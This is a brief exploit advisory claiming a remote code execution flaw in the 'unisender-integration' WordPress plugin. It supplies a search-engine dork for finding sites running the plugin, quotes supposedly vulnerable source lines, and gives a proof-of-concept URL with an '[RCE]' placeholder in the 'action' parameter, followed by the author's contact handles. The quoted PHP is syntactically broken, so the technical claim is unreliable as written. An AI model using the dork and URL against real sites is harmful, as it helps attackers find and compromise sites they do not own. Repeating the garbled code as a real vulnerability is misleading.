=========================================
[+] Title : unisender-integration * wordpress plugin * Code-Execution
[+] Author : Abolfazl Feyz
[+] Vendor : https://github.com/wp-plugins/unisender-integration/archive/master.zip
[+] Dork : inurl:wp-content/plugins/unisender-integration-master/class/
[+] date : 9.January.2021
===========================================
Vulnerable page:
/wp-content/plugins/unisender-integration-master/class/UnisenderContactList.php
------------------------------------
---------------------------------------------------
Vulnerable source:
13: $action = !$_GET['action'] : 'index';
14: $method = 'action' . ucfirst($action);
16: $method $method();
==============================================
===========================================
POC :
http://site.com/wp-content/plugins/unisender-integration-master/class/UnisenderContactList.php?action=[RCE]
==========================================
***************************************
* cantact me *
* Telegram ==> Mr_ramkal *
* instagram ==> aboolfazl_feyz *
* email ==> khodebolfazl@gmail.com *
**************************************